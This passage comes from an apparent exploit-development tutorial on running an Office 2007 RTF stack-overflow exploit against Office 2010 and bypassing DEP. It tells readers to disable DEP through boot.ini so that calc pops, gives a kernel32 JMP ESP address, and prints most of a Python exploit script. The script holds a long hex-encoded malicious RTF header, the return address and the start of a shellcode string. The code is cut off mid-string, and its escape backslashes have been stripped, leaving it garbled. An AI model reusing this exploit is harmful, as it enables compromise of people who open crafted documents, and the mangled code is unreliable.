We will also have to bypass DEP (Data Execution Prevention) since in Office 2010, DEP is enabled by default. I hope you’re familiar with DEP, but if not, here’s a brief description: “Data Execution Prevention (DEP) is a security feature included in modern operating systems. It is known to be available in Linux, Mac OS X, iOS, Microsoft Windows and Android operating systems and is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow.“ Anyway, don’t worry and don’t get confused. I will explain each and every line in detail so that by the end of this contribution, you will be well aware of how to run the exploit. Keep one thing in mind though, that in order to run an Office 2007 exploit on Office 2010, you have to have first change JMP ESP address, which I have already included in my previous post. I don’t want to repost the code here to make this post unnecessarily lengthy. So first, let’s find the JMP ESP address in Office 2010.
I found the JMP ESP address in Office 2010 in Kernal32.dll and that is 7C86467B. Let’s write this address in the Office 2007 exploit sample, and we’ll see the address will be written in reverse order (Big and Little Endian representation).
<2f909378> is an address in an Office 2007 exploit. Change it with JMP ESP of the Office 2010 DLL as explained above.
<Office 2010 JMP ESP address > Let’s now try to run this exploit on Office 2010. Wow, what is this? We got an error message as shown in the following picture.
See, in Windows, we will get a Data Execution Prevention error. Ok, let’s do one thing for demo purposes. Let’s first disable DEP and see what happens. Will we see Calcpopped after disabling DEP? Yes, of course. So in order to disable DEP, do the following. Start→ Run →cmd→cd→notepad Boot.ini Then change the value of noexecute to AlwaysOff in place of Optin.
Save and reboot the system, then double click on sample. If everything is fine, you will see Calcpopped. Wow – it’s working fine!
Data Execution Prevention is on by default on XP SP2 onwards so first disabling DEP and then running the exploit is not a feasible solution. We did this just as a demo. Our main objective in this article is bypassing DEP. So now we will look at the mechanism to bypass DEP, but I think it’s time now to discuss DEP a bit more. Hardware DEP takes advantage of the NX (“No Execute page protection,” AMD specification) or XD (“Execute Disable,” Intel specification) bit on DEP compatible CPUs, and will mark certain parts of the memory (which should only contain data, such as the default heap, stack, memory pools) as non-executable. When an attempt is made to execute code from a DEP protected page, an access violation “STATUS_ACCESS_VIOLATION(0xc0000005)” will occur. In most cases, this will result in process termination (unhandled exception). So as a result, when a developer has decided that he wants to allow code to run from a certain memory page, he will have to allocate the memory and mark it as executable. Support for hardware DEP was introduced in Windows XPSP2and Windows Server 2003 SP1. It’s now part of all versions of the Windows operating system ever since. The way DEP manifests itself within the Windows OS is based on a setting which can be configured to one of the following values: OptIn: Only a limited set of Windows system modules or binaries are protected by DEP. OptOut: All programs, processes and services in the Windows system are protected, except for processes in execution. AlwaysOn: All programs, processes, services, etc on the Windows system are protected. No execution is allowed. AlwaysOff: DEP is turned off. Ok, we will discuss later how to bypass DEP, but for now, you may be curious about the actual code of the exploit, where Calcis popped I don’t want to make this post too long but to make you understand better, I have to have write the complete code for it: [code] importdatetime importos header = (“x7Bx5Cx72x74x66x31x5Cx61x64x65x66x6Cx61x6Ex67x31” “x30x32x35x5Cx61x6Ex73x69x5Cx61x6Ex73x69x63x70x67” “x39x33x36x5Cx75x63x32x5Cx61x64x65x66x66x30x5Cx64” “x65x66x66x30x5Cx73x74x73x68x66x64x62x63x68x31x33” “x5Cx73x74x73x68x66x6Cx6Fx63x68x30x5Cx73x74x73x68” “x66x68x69x63x68x30x5Cx73x74x73x68x66x62x69x30x5C” “x64x65x66x6Cx61x6Ex67x31x30x33x33x5Cx64x65x66x6C” “x61x6Ex67x66x65x32x30x35x32x7Bx5Cx66x6Fx6Ex74x74” “x62x6Cx7Bx5Cx66x30x5Cx66x72x6Fx6Dx61x6Ex5Cx66x63” “x68x61x72x73x65x74x30x5Cx66x70x72x71x32x7Bx5Cx2A” “x5Cx70x61x6Ex6Fx73x65x20x30x32x30x32x30x36x30x33” “x30x35x30x34x30x35x30x32x30x33x30x34x7Dx54x69x6D” “x65x73x20x4Ex65x77x20x52x6Fx6Dx61x6Ex3Bx7Dx7Bx5C” “x66x31x33x5Cx66x6Ex69x6Cx5Cx66x63x68x61x72x73x65” “x74x31x33x34x5Cx66x70x72x71x32x7Bx5Cx2Ax5Cx70x61” “x6Ex6Fx73x65x20x30x32x30x31x30x36x30x30x30x33x30” “x31x30x31x30x31x30x31x30x31x7Dx5Cx27x63x62x5Cx27” “x63x65x5Cx27x63x63x5Cx27x65x35x7Bx5Cx2Ax5Cx66x61” “x6Cx74x20x53x69x6Dx53x75x6Ex7Dx3Bx7Dx0Dx0Ax7Bx5C” “x66x33x36x5Cx66x6Ex69x6Cx5Cx66x63x68x61x72x73x65” “x74x31x33x34x5Cx66x70x72x71x32x7Bx5Cx2Ax5Cx70x61” “x6Ex6Fx73x65x20x30x32x30x31x30x36x30x30x30x33x30” “x31x30x31x30x31x30x31x30x31x7Dx40x5Cx27x63x62x5C” “x27x63x65x5Cx27x63x63x5Cx27x65x35x3Bx7Dx7Bx5Cx66” “x33x37x5Cx66x72x6Fx6Dx61x6Ex5Cx66x63x68x61x72x73” “x65x74x32x33x38x5Cx66x70x72x71x32x20x54x69x6Dx65” “x73x20x4Ex65x77x20x52x6Fx6Dx61x6Ex20x43x45x3Bx7D” “x7Bx5Cx66x33x38x5Cx66x72x6Fx6Dx61x6Ex5Cx66x63x68” “x61x72x73x65x74x32x30x34x5Cx66x70x72x71x32x20x54” “x69x6Dx65x73x20x4Ex65x77x20x52x6Fx6Dx61x6Ex20x43” “x79x72x3Bx7Dx7Bx5Cx66x34x30x5Cx66x72x6Fx6Dx61x6E” “x5Cx66x63x68x61x72x73x65x74x31x36x31x5Cx66x70x72” “x71x32x20x54x69x6Dx65x73x20x4Ex65x77x20x52x6Fx6D” “x61x6Ex20x47x72x65x65x6Bx3Bx7Dx0Dx0Ax7Bx5Cx66x34” “x31x5Cx66x72x6Fx6Dx61x6Ex5Cx66x63x68x61x72x73x65” “x74x31x36x32x5Cx66x70x72x71x32x20x54x69x6Dx65x73” “x20x4Ex65x77x20x52x6Fx6Dx61x6Ex20x54x75x72x3Bx7D” “x7Bx5Cx66x34x32x5Cx66x62x69x64x69x20x5Cx66x72x6F” “x6Dx61x6Ex5Cx66x63x68x61x72x73x65x74x31x37x37x5C” “x66x70x72x71x32x20x54x69x6Dx65x73x20x4Ex65x77x20” “x52x6Fx6Dx61x6Ex20x28x48x65x62x72x65x77x29x3Bx7D” “x7Bx5Cx66x34x33x5Cx66x62x69x64x69x20x5Cx66x72x6F” “x6Dx61x6Ex5Cx66x63x68x61x72x73x65x74x31x37x38x5C” “x66x70x72x71x32x20x54x69x6Dx65x73x20x4Ex65x77x20” “x52x6Fx6Dx61x6Ex20x28x41x72x61x62x69x63x29x3Bx7D” “x7Bx5Cx66x34x34x5Cx66x72x6Fx6Dx61x6Ex5Cx66x63x68” “x61x72x73x65x74x31x38x36x5Cx66x70x72x71x32x20x54” “x69x6Dx65x73x20x4Ex65x77x20x52x6Fx6Dx61x6Ex20x42” “x61x6Cx74x69x63x3Bx7Dx0Dx0Ax7Bx5Cx66x34x35x5Cx66” “x72x6Fx6Dx61x6Ex5Cx66x63x68x61x72x73x65x74x31x36” “x33x5Cx66x70x72x71x32x20x54x69x6Dx65x73x20x4Ex65” “x77x20x52x6Fx6Dx61x6Ex20x28x56x69x65x74x6Ex61x6D” “x65x73x65x29x3Bx7Dx7Bx5Cx66x31x36x39x5Cx66x6Ex69” “x6Cx5Cx66x63x68x61x72x73x65x74x30x5Cx66x70x72x71” “x32x20x53x69x6Dx53x75x6Ex20x57x65x73x74x65x72x6E” “x7Bx5Cx2Ax5Cx66x61x6Cx74x20x53x69x6Dx53x75x6Ex7D” “x3Bx7Dx7Bx5Cx66x33x39x39x5Cx66x6Ex69x6Cx5Cx66x63” “x68x61x72x73x65x74x30x5Cx66x70x72x71x32x20x40x5C” “x27x63x62x5Cx27x63x65x5Cx27x63x63x5Cx27x65x35x20” “x57x65x73x74x65x72x6Ex3Bx7Dx7Dx7Bx5Cx63x6Fx6Cx6F” “x72x74x62x6Cx3Bx5Cx72x65x64x30x5Cx67x72x65x65x6E” “x30x5Cx62x6Cx75x65x30x3Bx5Cx72x65x64x30x5Cx67x72” “x65x65x6Ex30x5Cx62x6Cx75x65x32x35x35x3Bx5Cx72x65” “x64x30x5Cx67x72x65x65x6Ex32x35x35x5Cx62x6Cx75x65” “x32x35x35x3Bx0Dx0Ax5Cx72x65x64x30x5Cx67x72x65x65” “x6Ex32x35x35x5Cx62x6Cx75x65x30x3Bx5Cx72x65x64x32” “x35x35x5Cx67x72x65x65x6Ex30x5Cx62x6Cx75x65x32x35” “x35x3Bx5Cx72x65x64x32x35x35x5Cx67x72x65x65x6Ex30” “x5Cx62x6Cx75x65x30x3Bx5Cx72x65x64x32x35x35x5Cx67” “x72x65x65x6Ex32x35x35x5Cx62x6Cx75x65x30x3Bx5Cx72” “x65x64x32x35x35x5Cx67x72x65x65x6Ex32x35x35x5Cx62” “x6Cx75x65x32x35x35x3Bx5Cx72x65x64x30x5Cx67x72x65” “x65x6Ex30x5Cx62x6Cx75x65x31x32x38x3Bx5Cx72x65x64” “x30x5Cx67x72x65x65x6Ex31x32x38x5Cx62x6Cx75x65x31” “x32x38x3Bx5Cx72x65x64x30x5Cx67x72x65x65x6Ex31x32” “x38x5Cx62x6Cx75x65x30x3Bx5Cx72x65x64x31x32x38x5C” “x67x72x65x65x6Ex30x5Cx62x6Cx75x65x31x32x38x3Bx5C” “x72x65x64x31x32x38x5Cx67x72x65x65x6Ex30x5Cx62x6C” “x75x65x30x3Bx5Cx72x65x64x31x32x38x5Cx67x72x65x65” “x6Ex31x32x38x5Cx62x6Cx75x65x30x3Bx0Dx0Ax5Cx72x65” “x64x31x32x38x5Cx67x72x65x65x6Ex31x32x38x5Cx62x6C” “x75x65x31x32x38x3Bx5Cx72x65x64x31x39x32x5Cx67x72” “x65x65x6Ex31x39x32x5Cx62x6Cx75x65x31x39x32x3Bx7D” “x7Bx5Cx73x74x79x6Cx65x73x68x65x65x74x7Bx5Cx71x6A” “x20x5Cx6Cx69x30x5Cx72x69x30x5Cx6Ex6Fx77x69x64x63” “x74x6Cx70x61x72x5Cx77x72x61x70x64x65x66x61x75x6C” “x74x5Cx61x73x70x61x6Cx70x68x61x5Cx61x73x70x6Ex75” “x6Dx5Cx66x61x61x75x74x6Fx5Cx61x64x6Ax75x73x74x72” “x69x67x68x74x5Cx72x69x6Ex30x5Cx6Cx69x6Ex30x5Cx69” “x74x61x70x30x20x5Cx72x74x6Cx63x68x5Cx66x63x73x31” “x20x5Cx61x66x30x5Cx61x66x73x32x34x5Cx61x6Cx61x6E” “x67x31x30x32x35x20x5Cx6Cx74x72x63x68x5Cx66x63x73” “x30x20x0Dx0Ax5Cx66x73x32x31x5Cx6Cx61x6Ex67x31x30” “x33x33x5Cx6Cx61x6Ex67x66x65x32x30x35x32x5Cx6Bx65” “x72x6Ex69x6Ex67x32x5Cx6Cx6Fx63x68x5Cx66x30x5Cx68” “x69x63x68x5Cx61x66x30x5Cx64x62x63x68x5Cx61x66x31” “x33x5Cx63x67x72x69x64x5Cx6Cx61x6Ex67x6Ex70x31x30” “x33x33x5Cx6Cx61x6Ex67x66x65x6Ex70x32x30x35x32x20” “x5Cx73x6Ex65x78x74x30x20x4Ex6Fx72x6Dx61x6Cx3Bx7D” “x7Bx5Cx2Ax5Cx63x73x31x30x20x5Cx61x64x64x69x74x69” “x76x65x20x5Cx73x73x65x6Dx69x68x69x64x64x65x6Ex20” “x44x65x66x61x75x6Cx74x20x50x61x72x61x67x72x61x70” “x68x20x46x6Fx6Ex74x3Bx7Dx7Bx5Cx2Ax0Dx0Ax5Cx74x73” “x31x31x5Cx74x73x72x6Fx77x64x5Cx74x72x66x74x73x57” “x69x64x74x68x42x33x5Cx74x72x70x61x64x64x6Cx31x30” “x38x5Cx74x72x70x61x64x64x72x31x30x38x5Cx74x72x70” “x61x64x64x66x6Cx33x5Cx74x72x70x61x64x64x66x74x33” “x5Cx74x72x70x61x64x64x66x62x33x5Cx74x72x70x61x64” “x64x66x72x33x5Cx74x72x63x62x70x61x74x31x5Cx74x72” “x63x66x70x61x74x31x5Cx74x62x6Cx69x6Ex64x30x5Cx74” “x62x6Cx69x6Ex64x74x79x70x65x33x5Cx74x73x63x65x6C” “x6Cx77x69x64x74x68x66x74x73x30x5Cx74x73x76x65x72” “x74x61x6Cx74x5Cx74x73x62x72x64x72x74x5Cx74x73x62” “x72x64x72x6Cx5Cx74x73x62x72x64x72x62x5Cx74x73x62” “x72x64x72x72x5Cx74x73x62x72x64x72x64x67x6Cx5Cx74” “x73x62x72x64x72x64x67x72x5Cx74x73x62x72x64x72x68” “x5Cx74x73x62x72x64x72x76x20x0Dx0Ax5Cx71x6Cx20x5C” “x6Cx69x30x5Cx72x69x30x5Cx77x69x64x63x74x6Cx70x61” “x72x5Cx77x72x61x70x64x65x66x61x75x6Cx74x5Cx61x73” “x70x61x6Cx70x68x61x5Cx61x73x70x6Ex75x6Dx5Cx66x61” “x61x75x74x6Fx5Cx61x64x6Ax75x73x74x72x69x67x68x74” “x5Cx72x69x6Ex30x5Cx6Cx69x6Ex30x5Cx69x74x61x70x30” “x20x5Cx72x74x6Cx63x68x5Cx66x63x73x31x20x5Cx61x66” “x30x5Cx61x66x73x32x30x20x5Cx6Cx74x72x63x68x5Cx66” “x63x73x30x20x5Cx66x73x32x30x5Cx6Cx61x6Ex67x31x30” “x32x34x5Cx6Cx61x6Ex67x66x65x31x30x32x34x5Cx6Cx6F” “x63x68x5Cx66x30x5Cx68x69x63x68x5Cx61x66x30x5Cx64” “x62x63x68x5Cx61x66x31x33x5Cx63x67x72x69x64x5Cx6C” “x61x6Ex67x6Ex70x31x30x32x34x5Cx6Cx61x6Ex67x66x65” “x6Ex70x31x30x32x34x20x5Cx73x6Ex65x78x74x31x31x20” “x5Cx73x73x65x6Dx69x68x69x64x64x65x6Ex20x4Ex6Fx72” “x6Dx61x6Cx20x54x61x62x6Cx65x3Bx7Dx7Dx0Dx0Ax7Bx5C” “x2Ax5Cx6Cx61x74x65x6Ex74x73x74x79x6Cx65x73x5Cx6C” “x73x64x73x74x69x6Dx61x78x31x35x36x5Cx6Cx73x64x6C” “x6Fx63x6Bx65x64x64x65x66x30x7Dx7Bx5Cx2Ax5Cx72x73” “x69x64x74x62x6Cx20x5Cx72x73x69x64x31x35x38x30x37” “x35x31x39x7Dx7Bx5Cx2Ax5Cx67x65x6Ex65x72x61x74x6F” “x72x20x4Dx69x63x72x6Fx73x6Fx66x74x20x57x6Fx72x64” “x20x31x31x2Ex30x2Ex30x30x30x30x3Bx7Dx7Bx5Cx69x6E” “x66x6Fx7Bx5Cx74x69x74x6Cx65x20x46x66x66x66x66x66” “x66x66x66x7Dx7Bx5Cx61x75x74x68x6Fx72x20x55x53x45” “x52x7Dx7Bx5Cx6Fx70x65x72x61x74x6Fx72x20x55x53x45” “x52x7Dx7Bx5Cx63x72x65x61x74x69x6Dx5Cx79x72x32x30” “x31x31x5Cx6Dx6Fx34x5Cx64x79x31x32x5Cx68x72x31x34” “x5Cx6Dx69x6Ex35x30x7Dx7Bx5Cx72x65x76x74x69x6Dx5C” “x79x72x32x30x31x31x5Cx6Dx6Fx34x5Cx64x79x31x32x5C” “x68x72x31x34x5Cx6Dx69x6Ex35x31x7Dx7Bx5Cx76x65x72” “x73x69x6Fx6Ex31x7Dx0Dx0Ax7Bx5Cx65x64x6Dx69x6Ex73” “x31x7Dx7Bx5Cx6Ex6Fx66x70x61x67x65x73x31x7Dx7Bx5C” “x6Ex6Fx66x77x6Fx72x64x73x31x7Dx7Bx5Cx6Ex6Fx66x63” “x68x61x72x73x39x7Dx7Bx5Cx2Ax5Cx63x6Fx6Dx70x61x6E” “x79x20x43x48x49x4Ex41x7Dx7Bx5Cx6Ex6Fx66x63x68x61” “x72x73x77x73x39x7Dx7Bx5Cx76x65x72x6Ex32x34x36x31” “x33x7Dx7Bx5Cx2Ax5Cx70x61x73x73x77x6Fx72x64x20x30” “x30x30x30x30x30x30x30x7Dx7Dx7Bx5Cx2Ax5Cx78x6Dx6C” “x6Ex73x74x62x6Cx20x7Bx5Cx78x6Dx6Cx6Ex73x31x20x68” “x74x74x70x3Ax2Fx2Fx73x63x68x65x6Dx61x73x2Ex6Dx69” “x63x72x6Fx73x6Fx66x74x2Ex63x6Fx6Dx2Fx6Fx66x66x69” “x63x65x2Fx77x6Fx72x64x2Fx32x30x30x33x2Fx77x6Fx72” “x64x6Dx6Cx7Dx7Dx0Dx0Ax5Cx70x61x70x65x72x77x31x31” “x39x30x36x5Cx70x61x70x65x72x68x31x36x38x33x38x5C” “x6Dx61x72x67x6Cx31x38x30x30x5Cx6Dx61x72x67x72x31” “x38x30x30x5Cx6Dx61x72x67x74x31x34x34x30x5Cx6Dx61” “x72x67x62x31x34x34x30x5Cx67x75x74x74x65x72x30x5C” “x6Cx74x72x73x65x63x74x20x0Dx0Ax5Cx64x65x66x74x61” “x62x34x32x30x5Cx66x74x6Ex62x6Ax5Cx61x65x6Ex64x64” “x6Fx63x5Cx64x6Fx6Ex6Fx74x65x6Dx62x65x64x73x79x73” “x66x6Fx6Ex74x31x5Cx64x6Fx6Ex6Fx74x65x6Dx62x65x64” “x6Cx69x6Ex67x64x61x74x61x30x5Cx67x72x66x64x6Fx63” “x65x76x65x6Ex74x73x30x5Cx76x61x6Cx69x64x61x74x65” “x78x6Dx6Cx31x5Cx73x68x6Fx77x70x6Cx61x63x65x68x6F” “x6Cx64x74x65x78x74x30x5Cx69x67x6Ex6Fx72x65x6Dx69” “x78x65x64x63x6Fx6Ex74x65x6Ex74x30x5Cx73x61x76x65” “x69x6Ex76x61x6Cx69x64x78x6Dx6Cx30x5Cx73x68x6Fx77” “x78x6Dx6Cx65x72x72x6Fx72x73x31x5Cx66x6Fx72x6Dx73” “x68x61x64x65x5Cx68x6Fx72x7Ax64x6Fx63x5Cx64x67x6D” “x61x72x67x69x6Ex5Cx64x67x68x73x70x61x63x65x31x38” “x30x5Cx64x67x76x73x70x61x63x65x31x35x36x5Cx64x67” “x68x6Fx72x69x67x69x6Ex31x38x30x30x5Cx64x67x76x6F” “x72x69x67x69x6Ex31x34x34x30x5Cx64x67x68x73x68x6F” “x77x30x0Dx0Ax5Cx64x67x76x73x68x6Fx77x32x5Cx6Ax63” “x6Fx6Dx70x72x65x73x73x5Cx6Cx6Ex6Fx6Ex67x72x69x64” “x5Cx76x69x65x77x6Bx69x6Ex64x31x5Cx76x69x65x77x73” “x63x61x6Cx65x31x30x30x5Cx73x70x6Cx79x74x77x6Ex69” “x6Ex65x5Cx66x74x6Ex6Cx79x74x77x6Ex69x6Ex65x5Cx68” “x74x6Dx61x75x74x73x70x5Cx75x73x65x6Cx74x62x61x6C” “x6Ex5Cx61x6Cx6Ex74x62x6Cx69x6Ex64x5Cx6Cx79x74x63” “x61x6Cx63x74x62x6Cx77x64x5Cx6Cx79x74x74x62x6Cx72” “x74x67x72x5Cx6Cx6Ex62x72x6Bx72x75x6Cx65x5Cx6Ex6F” “x62x72x6Bx77x72x70x74x62x6Cx5Cx76x69x65x77x6Ex6F” “x62x6Fx75x6Ex64x31x5Cx73x6Ex61x70x74x6Fx67x72x69” “x64x69x6Ex63x65x6Cx6Cx5Cx61x6Cx6Cx6Fx77x66x69x65” “x6Cx64x65x6Ex64x73x65x6Cx5Cx77x72x70x70x75x6Ex63” “x74x5Cx61x73x69x61x6Ex62x72x6Bx72x75x6Cx65x5Cx72” “x73x69x64x72x6Fx6Fx74x31x35x38x30x37x35x31x39x0D” “x0Ax5Cx6Ex65x77x74x62x6Cx73x74x79x72x75x6Cx73x5C” “x6Ex6Fx67x72x6Fx77x61x75x74x6Fx66x69x74x20x7Bx5C” “x2Ax5Cx66x63x68x61x72x73x20x0Dx0Ax21x29x2Cx2Ex3A” “x5Cx27x33x62x3Fx5Dx5Cx27x37x64x5Cx27x61x31x5Cx27” “x61x37x5Cx27x61x31x5Cx27x61x34x5Cx27x61x31x5Cx27” “x61x36x5Cx27x61x31x5Cx27x61x35x5Cx27x61x38x5Cx27” “x34x34x5Cx27x61x31x5Cx27x61x63x5Cx27x61x31x5Cx27” “x61x66x5Cx27x61x31x5Cx27x62x31x5Cx27x61x31x5Cx27” “x61x64x5Cx27x61x31x5Cx27x63x33x5Cx27x61x31x5Cx27” “x61x32x5Cx27x61x31x5Cx27x61x33x5Cx27x61x31x5Cx27” “x61x38x5Cx27x61x31x5Cx27x61x39x5Cx27x61x31x5Cx27” “x62x35x5Cx27x61x31x5Cx27x62x37x5Cx27x61x31x5Cx27” “x62x39x5Cx27x61x31x5Cx27x62x62x5Cx27x61x31x5Cx27” “x62x66x5Cx27x61x31x5Cx27x62x33x5Cx27x61x31x5Cx27” “x62x64x5Cx27x61x33x5Cx27x61x31x5Cx27x61x33x5Cx27” “x61x32x5Cx27x61x33x5Cx27x61x37x5Cx27x61x33x5Cx27” “x61x39x5Cx27x61x33x5Cx27x61x63x5Cx27x61x33x5Cx27” “x61x65x5Cx27x61x33x5Cx27x62x61x5Cx27x61x33x5Cx27” “x62x62x5Cx27x61x33x5Cx27x62x66x5Cx27x61x33x5Cx27” “x64x64x5Cx27x61x33x5Cx27x65x30x5Cx27x61x33x5Cx27” “x66x63x5Cx27x61x33x5Cx27x66x64x5Cx27x61x31x5Cx27” “x61x62x5Cx27x61x31x5Cx27x65x39x0Dx0Ax7Dx7Bx5Cx2A” “x5Cx6Cx63x68x61x72x73x20x28x5Bx5Cx27x37x62x5Cx27” “x61x31x5Cx27x61x34x5Cx27x61x31x5Cx27x61x65x5Cx27” “x61x31x5Cx27x62x30x5Cx27x61x31x5Cx27x62x34x5Cx27” “x61x31x5Cx27x62x36x5Cx27x61x31x5Cx27x62x38x5Cx27” “x61x31x5Cx27x62x61x5Cx27x61x31x5Cx27x62x65x5Cx27” “x61x31x5Cx27x62x32x5Cx27x61x31x5Cx27x62x63x5Cx27” “x61x33x5Cx27x61x38x5Cx27x61x33x5Cx27x61x65x5Cx27” “x61x33x5Cx27x64x62x5Cx27x61x33x5Cx27x66x62x5Cx27” “x61x31x5Cx27x65x61x5Cx27x61x33x5Cx27x61x34x7Dx5C” “x66x65x74x30x7Bx5Cx2Ax5Cx77x67x72x66x66x6Dx74x66” “x69x6Cx74x65x72x20x30x31x33x66x7Dx5Cx69x6Cx66x6F” “x6Dx61x63x61x74x63x6Cx6Ex75x70x30x5Cx6Cx74x72x70” “x61x72x20x5Cx73x65x63x74x64x20x5Cx6Cx74x72x73x65” “x63x74x0Dx0Ax5Cx6Cx69x6Ex65x78x30x5Cx68x65x61x64” “x65x72x79x38x35x31x5Cx66x6Fx6Fx74x65x72x79x39x39” “x32x5Cx63x6Fx6Cx73x78x34x32x35x5Cx65x6Ex64x6Ex68” “x65x72x65x5Cx73x65x63x74x6Cx69x6Ex65x67x72x69x64” “x33x31x32x5Cx73x65x63x74x73x70x65x63x69x66x79x6C” “x5Cx73x66x74x6Ex62x6Ax20x7Bx5Cx2Ax5Cx70x6Ex73x65” “x63x6Cx76x6Cx31x5Cx70x6Ex75x63x72x6Dx5Cx70x6Ex73” “x74x61x72x74x31x5Cx70x6Ex69x6Ex64x65x6Ex74x37x32” “x30x5Cx70x6Ex68x61x6Ex67x20x7Bx5Cx70x6Ex74x78x74” “x61x20x5Cx64x62x63x68x20x2Ex7Dx7Dx7Bx5Cx2Ax5Cx70” “x6Ex73x65x63x6Cx76x6Cx32x5Cx70x6Ex75x63x6Cx74x72” “x5Cx70x6Ex73x74x61x72x74x31x5Cx70x6Ex69x6Ex64x65” “x6Ex74x37x32x30x5Cx70x6Ex68x61x6Ex67x20x7Bx5Cx70” “x6Ex74x78x74x61x20x5Cx64x62x63x68x20x2Ex7Dx7Dx7B” “x5Cx2Ax5Cx70x6Ex73x65x63x6Cx76x6Cx33x0Dx0Ax5Cx70” “x6Ex64x65x63x5Cx70x6Ex73x74x61x72x74x31x5Cx70x6E” “x69x6Ex64x65x6Ex74x37x32x30x5Cx70x6Ex68x61x6Ex67” “x20x7Bx5Cx70x6Ex74x78x74x61x20x5Cx64x62x63x68x20” “x2Ex7Dx7Dx7Bx5Cx2Ax5Cx70x6Ex73x65x63x6Cx76x6Cx34” “x5Cx70x6Ex6Cx63x6Cx74x72x5Cx70x6Ex73x74x61x72x74” “x31x5Cx70x6Ex69x6Ex64x65x6Ex74x37x32x30x5Cx70x6E” “x68x61x6Ex67x20x7Bx5Cx70x6Ex74x78x74x61x20x5Cx64” “x62x63x68x20x29x7Dx7Dx7Bx5Cx2Ax5Cx70x6Ex73x65x63” “x6Cx76x6Cx35x5Cx70x6Ex64x65x63x5Cx70x6Ex73x74x61” “x72x74x31x5Cx70x6Ex69x6Ex64x65x6Ex74x37x32x30x5C” “x70x6Ex68x61x6Ex67x20x7Bx5Cx70x6Ex74x78x74x62x20” “x5Cx64x62x63x68x20x28x7Dx7Bx5Cx70x6Ex74x78x74x61” “x20x5Cx64x62x63x68x20x29x7Dx7Dx7Bx5Cx2Ax5Cx70x6E” “x73x65x63x6Cx76x6Cx36x5Cx70x6Ex6Cx63x6Cx74x72x5C” “x70x6Ex73x74x61x72x74x31x5Cx70x6Ex69x6Ex64x65x6E” “x74x37x32x30x5Cx70x6Ex68x61x6Ex67x20x0Dx0Ax7Bx5C” “x70x6Ex74x78x74x62x20x5Cx64x62x63x68x20x28x7Dx7B” “x5Cx70x6Ex74x78x74x61x20x5Cx64x62x63x68x20x29x7D” “x7Dx7Bx5Cx2Ax5Cx70x6Ex73x65x63x6Cx76x6Cx37x5Cx70” “x6Ex6Cx63x72x6Dx5Cx70x6Ex73x74x61x72x74x31x5Cx70” “x6Ex69x6Ex64x65x6Ex74x37x32x30x5Cx70x6Ex68x61x6E” “x67x20x7Bx5Cx70x6Ex74x78x74x62x20x5Cx64x62x63x68” “x20x28x7Dx7Bx5Cx70x6Ex74x78x74x61x20x5Cx64x62x63” “x68x20x29x7Dx7Dx7Bx5Cx2Ax5Cx70x6Ex73x65x63x6Cx76” “x6Cx38x5Cx70x6Ex6Cx63x6Cx74x72x5Cx70x6Ex73x74x61” “x72x74x31x5Cx70x6Ex69x6Ex64x65x6Ex74x37x32x30x5C” “x70x6Ex68x61x6Ex67x20x7Bx5Cx70x6Ex74x78x74x62x20” “x5Cx64x62x63x68x20x28x7Dx7Bx5Cx70x6Ex74x78x74x61” “x20x5Cx64x62x63x68x20x29x7Dx7Dx7Bx5Cx2Ax5Cx70x6E” “x73x65x63x6Cx76x6Cx39x5Cx70x6Ex6Cx63x72x6Dx5Cx70” “x6Ex73x74x61x72x74x31x5Cx70x6Ex69x6Ex64x65x6Ex74” “x37x32x30x5Cx70x6Ex68x61x6Ex67x20x0Dx0Ax7Bx5Cx70” “x6Ex74x78x74x62x20x5Cx64x62x63x68x20x28x7Dx7Bx5C” “x70x6Ex74x78x74x61x20x5Cx64x62x63x68x20x29x7Dx7D” “x5Cx70x61x72x64x5Cx70x6Cx61x69x6Ex20x5Cx6Cx74x72” “x70x61x72x5Cx71x6Ax20x5Cx6Cx69x30x5Cx72x69x30x5C” “x6Ex6Fx77x69x64x63x74x6Cx70x61x72x5Cx77x72x61x70” “x64x65x66x61x75x6Cx74x5Cx61x73x70x61x6Cx70x68x61” “x5Cx61x73x70x6Ex75x6Dx5Cx66x61x61x75x74x6Fx5Cx61” “x64x6Ax75x73x74x72x69x67x68x74x5Cx72x69x6Ex30x5C” “x6Cx69x6Ex30x5Cx69x74x61x70x30x20x5Cx72x74x6Cx63” “x68x5Cx66x63x73x31x20x5Cx61x66x30x5Cx61x66x73x32” “x34x5Cx61x6Cx61x6Ex67x31x30x32x35x20x5Cx6Cx74x72” “x63x68x5Cx66x63x73x30x20x0Dx0Ax5Cx66x73x32x31x5C” “x6Cx61x6Ex67x31x30x33x33x5Cx6Cx61x6Ex67x66x65x32” “x30x35x32x5Cx6Bx65x72x6Ex69x6Ex67x32x5Cx6Cx6Fx63” “x68x5Cx61x66x30x5Cx68x69x63x68x5Cx61x66x30x5Cx64” “x62x63x68x5Cx61x66x31x33x5Cx63x67x72x69x64x5Cx6C” “x61x6Ex67x6Ex70x31x30x33x33x5Cx6Cx61x6Ex67x66x65” “x6Ex70x32x30x35x32x20x7Bx5Cx72x74x6Cx63x68x5Cx66” “x63x73x31x20x5Cx61x66x30x20x5Cx6Cx74x72x63x68x5C” “x66x63x73x30x20x5Cx69x6Ex73x72x73x69x64x31x35x38” “x30x37x35x31x39x20x5Cx68x69x63x68x5Cx61x66x30x5C” “x64x62x63x68x5Cx61x66x31x33x5Cx6Cx6Fx63x68x5Cx66” “x30x20x46x7Dx7Bx5Cx72x74x6Cx63x68x5Cx66x63x73x31” “x20x5Cx61x66x30x20x5Cx6Cx74x72x63x68x5Cx66x63x73” “x30x20x5Cx69x6Ex73x72x73x69x64x31x35x38x30x37x35” “x31x39x20x5Cx68x69x63x68x5Cx61x66x30x5Cx64x62x63” “x68x5Cx61x66x31x33x5Cx6Cx6Fx63x68x7Dx7Bx5Cx73x68” “x70x7Bx5Cx73x70x7Bx5Cx73x6Ex31x09x70x66x52x61x47” “x4Dx65x4Ex54x73x7Dx7Bx5Cx73x76x20x31x3Bx31x3Bx30” “x31x31x31x31x31x31x31x66x66x30x33x30x30x30x30x30” “x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30” “x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30” “x30x30x30”) jmpesp=(“x37x62x34x36x38x36x37x63”) # taken from Kernal32.dll header2=(“x30x30x30x30x38” “x30x37x63x30x30x30x30x38x30x37x63x42x42x42x42x42” “x42x42x42x43x43x43x43x43x43x43x43x44x44x44x44x44” “x44x44x44x39x30x39x30”) magic =(“x38x33x65x63x34x30x64x62x63x30x33x31x63x39x62x66x37x63x31x36x37x30” “x63x63x64x39x37x34x32x34x66x34x62x31x31x65x35x38” 